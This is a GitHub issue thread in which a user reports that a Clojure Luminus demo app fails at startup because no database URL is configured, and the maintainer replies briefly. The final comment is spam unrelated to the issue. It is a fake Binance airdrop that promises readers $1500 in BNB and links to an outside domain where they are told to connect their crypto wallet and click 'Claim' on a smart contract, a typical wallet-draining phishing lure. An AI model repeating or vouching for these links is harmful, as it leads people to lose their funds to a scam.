### ISSUE TITLE
[ HELP ] Error running this demo-app

### ISSUE THREAD

**Issue by abhi18av** [jmckitrick/demo-app#1]
Hi @jmckitrick 

I was looking for some sample project from which I could learn about adding JWT authorization to a luminus based service application and I stumbled upon your demo, from which I could learn a lot :)

However, when I do `lein run` in the terminal it throws the following error 

```
Abhinavs-MacBook-Pro:demo-app eklavya$ lein run
2018-08-25 19:19:10,858 [main] INFO  compojure.api.coercion.schema - :schema coercion enabled in compojure.api 
2018-08-25 19:19:12,620 [main] INFO  compojure.api.coercion.spec - :spec coercion enabled in compojure.api 
2018-08-25 19:19:16,223 [main] INFO  compojure.api.swagger - :spec swagger generation enabled in compojure.api 
2018-08-25 19:19:24,312 [main] DEBUG org.jboss.logging - Logging Provider: org.jboss.logging.Slf4jLoggerProvider 
Exception in thread "main" java.lang.RuntimeException: could not start [#'demo-app.db.core/*db*] due to, compiling:(/private/var/folders/gz/sdxvfmgd0_38g225sldvm7j00000gn/T/form-init731966973767089448.clj:1:124)
	at clojure.lang.Compiler.load(Compiler.java:7526)
	at clojure.lang.Compiler.loadFile(Compiler.java:7452)
	at clojure.main$load_script.invokeStatic(main.clj:278)
	at clojure.main$init_opt.invokeStatic(main.clj:280)
	at clojure.main$init_opt.invoke(main.clj:280)
	at clojure.main$initialize.invokeStatic(main.clj:311)
	at clojure.main$null_opt.invokeStatic(main.clj:345)
	at clojure.main$null_opt.invoke(main.clj:342)
	at clojure.main$main.invokeStatic(main.clj:424)
	at clojure.main$main.doInvoke(main.clj:387)
	at clojure.lang.RestFn.applyTo(RestFn.java:137)
	at clojure.lang.Var.applyTo(Var.java:702)
	at clojure.main.main(main.java:37)
Caused by: java.lang.RuntimeException: could not start [#'demo-app.db.core/*db*] due to
	at mount.core$up$fn__1886.invoke(core.cljc:92)
	at mount.core$up.invokeStatic(core.cljc:92)
	at mount.core$up.invoke(core.cljc:90)
	at mount.core$bring.invokeStatic(core.cljc:242)
	at mount.core$bring.invoke(core.cljc:234)
	at mount.core$start.invokeStatic(core.cljc:284)
	at mount.core$start.doInvoke(core.cljc:276)
	at clojure.lang.RestFn.invoke(RestFn.java:397)
	at mount.core$start_with_args.invokeStatic(core.cljc:384)
	at mount.core$start_with_args.doInvoke(core.cljc:380)
	at clojure.lang.RestFn.invoke(RestFn.java:410)
	at demo_app.core$start_app.invokeStatic(core.clj:42)
	at demo_app.core$start_app.invoke(core.clj:41)
	at demo_app.core$_main.invokeStatic(core.clj:62)
	at demo_app.core$_main.doInvoke(core.clj:49)
	at clojure.lang.RestFn.invoke(RestFn.java:397)
	at clojure.lang.Var.invoke(Var.java:377)
	at user$eval51889.invokeStatic(form-init731966973767089448.clj:1)
	at user$eval51889.invoke(form-init731966973767089448.clj:1)
	at clojure.lang.Compiler.eval(Compiler.java:7062)
	at clojure.lang.Compiler.eval(Compiler.java:7052)
	at clojure.lang.Compiler.load(Compiler.java:7514)
	... 12 more
Caused by: java.lang.Exception: one of :jdbc-url, :adapter, :datasource, or :datasource-classname is required to initialize the connection!
	at conman.core$make_config.invokeStatic(core.clj:112)
	at conman.core$make_config.invoke(core.clj:111)
	at conman.core$connect_BANG_.invokeStatic(core.clj:126)
	at conman.core$connect_BANG_.invoke(core.clj:122)
	at demo_app.db.core$eval43981$fn__43982.invoke(core.clj:20)
	at mount.core$record_BANG_.invokeStatic(core.cljc:86)
	at mount.core$record_BANG_.invoke(core.cljc:85)
	at mount.core$up$fn__1886.invoke(core.cljc:93)
	... 33 more
Abhinavs-MacBook-Pro:demo-app eklavya$ 
```

Could you please help me out a little bit here?

**Comment by jmckitrick** [comment]
Do you have a database provider setup?

**Comment by abhi18av** [comment]
Yes, I did run all the files in the `bin` directory and then it still throws errors.

**Comment by jmckitrick** [comment]
This was a demo project where I was working through the lacinia/graphql tutorial, so I cannot guarantee it is working. I'll take a look in a couple of days.
IIRC, the tutorial abstracted the DB into a docker container and I know it was working at one point.

**Comment by prezo-ci-bkp** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @
